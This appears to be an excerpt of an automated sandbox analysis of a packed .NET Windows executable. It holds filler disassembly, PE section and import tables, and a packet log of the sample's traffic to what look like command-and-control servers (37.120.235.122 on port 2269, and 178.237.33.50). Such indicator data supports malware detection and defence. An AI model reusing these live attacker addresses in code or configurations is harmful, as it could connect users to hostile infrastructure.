add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xee250	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf0000	0x2000	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xec2a4	0xec400	81d7efde79c48ab4e28659e90726b591	False	0.9738363921957672	data	7.974353343649891	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xf0000	0x2000	0x2000	35733e03744ed876f9cd87a029fa0b24	False	0.7213134765625	data	6.6490830208730465	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xf2000	0xc	0x200	0167045f9c820dd4179c453a5dc1a843	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xf00c8	0x1760	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9102606951871658
RT_GROUP_ICON	0xf1838	0x14	data	1.05
RT_VERSION	0xf185c	0x31c	data	0.4371859296482412

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 3, 2024 11:20:51.983205080 CEST	49675	443	192.168.2.5	23.1.237.91
May 3, 2024 11:20:51.983207941 CEST	49674	443	192.168.2.5	23.1.237.91
May 3, 2024 11:20:52.108239889 CEST	49673	443	192.168.2.5	23.1.237.91
May 3, 2024 11:20:54.784171104 CEST	49707	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:55.159523010 CEST	2269	49707	37.120.235.122	192.168.2.5
May 3, 2024 11:20:55.159687996 CEST	49707	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:55.166419983 CEST	49707	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:55.645536900 CEST	2269	49707	37.120.235.122	192.168.2.5
May 3, 2024 11:20:55.686326027 CEST	49707	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:56.085825920 CEST	2269	49707	37.120.235.122	192.168.2.5
May 3, 2024 11:20:56.092698097 CEST	49707	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:56.447470903 CEST	2269	49707	37.120.235.122	192.168.2.5
May 3, 2024 11:20:56.447534084 CEST	49707	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:56.828026056 CEST	2269	49707	37.120.235.122	192.168.2.5
May 3, 2024 11:20:56.999524117 CEST	2269	49707	37.120.235.122	192.168.2.5
May 3, 2024 11:20:57.001786947 CEST	49707	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:57.415896893 CEST	2269	49707	37.120.235.122	192.168.2.5
May 3, 2024 11:20:57.418453932 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:57.422904015 CEST	49710	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:57.455219984 CEST	49711	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:57.467566967 CEST	49707	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:57.606463909 CEST	49712	80	192.168.2.5	178.237.33.50
May 3, 2024 11:20:57.749562979 CEST	2269	49710	37.120.235.122	192.168.2.5
May 3, 2024 11:20:57.749586105 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:20:57.749680996 CEST	49710	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:57.749681950 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:57.753283978 CEST	49710	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:57.755893946 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:57.774224043 CEST	80	49712	178.237.33.50	192.168.2.5
May 3, 2024 11:20:57.774343014 CEST	49712	80	192.168.2.5	178.237.33.50
May 3, 2024 11:20:57.774470091 CEST	49712	80	192.168.2.5	178.237.33.50
May 3, 2024 11:20:57.791460991 CEST	2269	49711	37.120.235.122	192.168.2.5
May 3, 2024 11:20:57.791832924 CEST	49711	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:57.795013905 CEST	49711	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:57.935240984 CEST	49713	443	192.168.2.5	104.126.112.149
May 3, 2024 11:20:57.935267925 CEST	443	49713	104.126.112.149	192.168.2.5
May 3, 2024 11:20:57.935549974 CEST	49713	443	192.168.2.5	104.126.112.149
May 3, 2024 11:20:57.937442064 CEST	49713	443	192.168.2.5	104.126.112.149
May 3, 2024 11:20:57.937455893 CEST	443	49713	104.126.112.149	192.168.2.5
May 3, 2024 11:20:57.945354939 CEST	80	49712	178.237.33.50	192.168.2.5
May 3, 2024 11:20:57.945486069 CEST	49712	80	192.168.2.5	178.237.33.50
May 3, 2024 11:20:57.955791950 CEST	49707	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:58.099554062 CEST	2269	49710	37.120.235.122	192.168.2.5
May 3, 2024 11:20:58.099611998 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:20:58.128146887 CEST	443	49713	104.126.112.149	192.168.2.5
May 3, 2024 11:20:58.128302097 CEST	49713	443	192.168.2.5	104.126.112.149
May 3, 2024 11:20:58.131016970 CEST	49713	443	192.168.2.5	104.126.112.149
May 3, 2024 11:20:58.131026030 CEST	443	49713	104.126.112.149	192.168.2.5
May 3, 2024 11:20:58.131278992 CEST	443	49713	104.126.112.149	192.168.2.5
May 3, 2024 11:20:58.144706964 CEST	2269	49711	37.120.235.122	192.168.2.5
May 3, 2024 11:20:58.155055046 CEST	49710	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:58.155180931 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:58.170727015 CEST	49713	443	192.168.2.5	104.126.112.149
May 3, 2024 11:20:58.173110962 CEST	49713	443	192.168.2.5	104.126.112.149
May 3, 2024 11:20:58.186393976 CEST	49711	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:58.220120907 CEST	443	49713	104.126.112.149	192.168.2.5
May 3, 2024 11:20:58.299108028 CEST	443	49713	104.126.112.149	192.168.2.5
May 3, 2024 11:20:58.299242020 CEST	443	49713	104.126.112.149	192.168.2.5
May 3, 2024 11:20:58.299309015 CEST	49713	443	192.168.2.5	104.126.112.149
May 3, 2024 11:20:58.299309015 CEST	49713	443	192.168.2.5	104.126.112.149
May 3, 2024 11:20:58.299475908 CEST	49713	443	192.168.2.5	104.126.112.149
May 3, 2024 11:20:58.299496889 CEST	443	49713	104.126.112.149	192.168.2.5
May 3, 2024 11:20:58.339379072 CEST	2269	49707	37.120.235.122	192.168.2.5
May 3, 2024 11:20:58.356833935 CEST	49714	443	192.168.2.5	104.126.112.149
May 3, 2024 11:20:58.356869936 CEST	443	49714	104.126.112.149	192.168.2.5
May 3, 2024 11:20:58.357213974 CEST	49714	443	192.168.2.5	104.126.112.149
May 3, 2024 11:20:58.357362032 CEST	49714	443	192.168.2.5	104.126.112.149
May 3, 2024 11:20:58.357376099 CEST	443	49714	104.126.112.149	192.168.2.5
May 3, 2024 11:20:58.540230989 CEST	443	49714	104.126.112.149	192.168.2.5
May 3, 2024 11:20:58.540292025 CEST	49714	443	192.168.2.5	104.126.112.149
May 3, 2024 11:20:58.541430950 CEST	49714	443	192.168.2.5	104.126.112.149
May 3, 2024 11:20:58.541440010 CEST	443	49714	104.126.112.149	192.168.2.5
May 3, 2024 11:20:58.541673899 CEST	443	49714	104.126.112.149	192.168.2.5
May 3, 2024 11:20:58.542731047 CEST	49714	443	192.168.2.5	104.126.112.149
May 3, 2024 11:20:58.584124088 CEST	443	49714	104.126.112.149	192.168.2.5
May 3, 2024 11:20:58.753962040 CEST	2269	49710	37.120.235.122	192.168.2.5
May 3, 2024 11:20:58.753982067 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:20:58.758249044 CEST	443	49714	104.126.112.149	192.168.2.5
May 3, 2024 11:20:58.758390903 CEST	443	49714	104.126.112.149	192.168.2.5
May 3, 2024 11:20:58.758636951 CEST	49710	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:58.758714914 CEST	49714	443	192.168.2.5	104.126.112.149
May 3, 2024 11:20:58.759043932 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:58.763031960 CEST	49710	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:58.764671087 CEST	49714	443	192.168.2.5	104.126.112.149
May 3, 2024 11:20:58.764688015 CEST	443	49714	104.126.112.149	192.168.2.5
May 3, 2024 11:20:58.764708996 CEST	49714	443	192.168.2.5	104.126.112.149
May 3, 2024 11:20:58.764715910 CEST	443	49714	104.126.112.149	192.168.2.5
May 3, 2024 11:20:58.776789904 CEST	2269	49711	37.120.235.122	192.168.2.5
May 3, 2024 11:20:58.781037092 CEST	49711	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:58.787092924 CEST	49711	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:58.947244883 CEST	80	49712	178.237.33.50	192.168.2.5
May 3, 2024 11:20:58.947315931 CEST	49712	80	192.168.2.5	178.237.33.50
May 3, 2024 11:20:59.436325073 CEST	49710	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:59.451944113 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:59.483196974 CEST	49711	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:59.506834984 CEST	2269	49710	37.120.235.122	192.168.2.5
May 3, 2024 11:20:59.506855965 CEST	2269	49710	37.120.235.122	192.168.2.5
May 3, 2024 11:20:59.506870031 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:20:59.506896019 CEST	49710	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:59.506938934 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:59.510524035 CEST	2269	49711	37.120.235.122	192.168.2.5
May 3, 2024 11:20:59.510557890 CEST	2269	49711	37.120.235.122	192.168.2.5
May 3, 2024 11:20:59.510570049 CEST	2269	49711	37.120.235.122	192.168.2.5
May 3, 2024 11:20:59.510915041 CEST	49711	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:59.510951996 CEST	49711	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:59.550257921 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:20:59.550317049 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:59.559119940 CEST	2269	49710	37.120.235.122	192.168.2.5
May 3, 2024 11:20:59.559175014 CEST	49710	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:59.866817951 CEST	2269	49710	37.120.235.122	192.168.2.5
May 3, 2024 11:20:59.867640018 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:20:59.907984972 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:20:59.911046982 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:20:59.911107063 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:59.912014961 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:20:59.912034035 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:20:59.912097931 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:59.921003103 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:20:59.921021938 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:20:59.921036959 CEST	2269	49711	37.120.235.122	192.168.2.5
May 3, 2024 11:20:59.921127081 CEST	49711	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:59.921247005 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:20:59.921288967 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:59.921513081 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:20:59.922472954 CEST	2269	49711	37.120.235.122	192.168.2.5
May 3, 2024 11:20:59.922547102 CEST	49711	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:59.922585964 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:20:59.922600985 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:20:59.922626019 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:59.922652006 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:20:59.922738075 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:59.925683975 CEST	2269	49711	37.120.235.122	192.168.2.5
May 3, 2024 11:20:59.925762892 CEST	49711	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:20:59.925796986 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.278817892 CEST	2269	49711	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.278841019 CEST	2269	49711	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.278858900 CEST	2269	49711	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.278901100 CEST	49711	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:00.278966904 CEST	49711	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:00.287146091 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.289213896 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.289268970 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:00.290016890 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.292077065 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.292118073 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:00.292902946 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.293970108 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.294207096 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:00.295008898 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.296998978 CEST	2269	49711	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.297070026 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.297096014 CEST	49711	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:00.297108889 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:00.299774885 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.300997972 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.301053047 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:00.302854061 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.305737972 CEST	2269	49711	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.305779934 CEST	2269	49711	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.305836916 CEST	49711	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:00.305836916 CEST	49711	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:00.305876970 CEST	49711	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:00.305896044 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.305911064 CEST	2269	49711	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.305947065 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:00.305991888 CEST	49711	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:00.306593895 CEST	2269	49711	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.310164928 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.312942982 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.312992096 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:00.313857079 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.315757990 CEST	2269	49711	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.315887928 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.315968037 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:00.316975117 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.318746090 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.318795919 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:00.319832087 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.321999073 CEST	2269	49711	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.322010994 CEST	2269	49711	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.322123051 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.322256088 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:00.795730114 CEST	49711	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:00.968121052 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:00.970428944 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:01.204158068 CEST	2269	49711	37.120.235.122	192.168.2.5
May 3, 2024 11:21:01.219933987 CEST	2269	49711	37.120.235.122	192.168.2.5
May 3, 2024 11:21:01.228347063 CEST	2269	49711	37.120.235.122	192.168.2.5
May 3, 2024 11:21:01.228503942 CEST	2269	49711	37.120.235.122	192.168.2.5
May 3, 2024 11:21:01.228830099 CEST	2269	49711	37.120.235.122	192.168.2.5
May 3, 2024 11:21:01.229547977 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:01.230412960 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:01.230474949 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:01.231488943 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:01.231522083 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:01.231537104 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:01.232515097 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:01.233628035 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:01.233675003 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:01.234750986 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:01.234765053 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:01.234800100 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:01.235755920 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:01.236520052 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:01.243650913 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:01.243664980 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:01.243678093 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:01.243726015 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:01.243752003 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:01.244551897 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:01.244565964 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:01.244606018 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:01.592552900 CEST	49675	443	192.168.2.5	23.1.237.91
May 3, 2024 11:21:01.592556000 CEST	49674	443	192.168.2.5	23.1.237.91
May 3, 2024 11:21:01.717596054 CEST	49673	443	192.168.2.5	23.1.237.91
May 3, 2024 11:21:01.977353096 CEST	2269	49711	37.120.235.122	192.168.2.5
May 3, 2024 11:21:01.977384090 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:01.977395058 CEST	2269	49711	37.120.235.122	192.168.2.5
May 3, 2024 11:21:01.977924109 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:01.977977991 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:01.999258041 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:01.999279022 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:01.999320030 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.000930071 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.001015902 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.001044035 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.001066923 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.001091003 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.001104116 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.001126051 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.001128912 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.001166105 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.001914978 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.007457972 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.007509947 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.008877993 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.008919954 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.011950970 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.011995077 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.012900114 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.012938976 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.012945890 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.012958050 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.012980938 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.012989044 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.013001919 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.013001919 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.013025045 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.013030052 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.013041019 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.013055086 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.013063908 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.013089895 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.060512066 CEST	2269	49711	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.060621023 CEST	49711	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.334347963 CEST	2269	49711	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.942120075 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.942198992 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.958153009 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.958218098 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.958400011 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.958444118 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.958458900 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.958496094 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.959904909 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.959954023 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.959964037 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.960004091 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.960905075 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.960946083 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.963180065 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.963221073 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.964133024 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.964174986 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.965857983 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.965902090 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.966929913 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.966970921 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.968091011 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.968146086 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.971939087 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.971991062 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.972914934 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.972960949 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.974946976 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.974997997 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.976922989 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.976974010 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.979018927 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.979063988 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.982249975 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.982297897 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.983815908 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.983863115 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.984879017 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.984920979 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.986829996 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.986875057 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.998116016 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.998164892 CEST	49709	2269	192.168.2.5	37.120.235.122
May 3, 2024 11:21:02.998188972 CEST	2269	49709	37.120.235.122	192.168.2.5
May 3, 2024 11:21:02.998239994 CEST	49709	2269	192.168.2.5	37.120.235.122
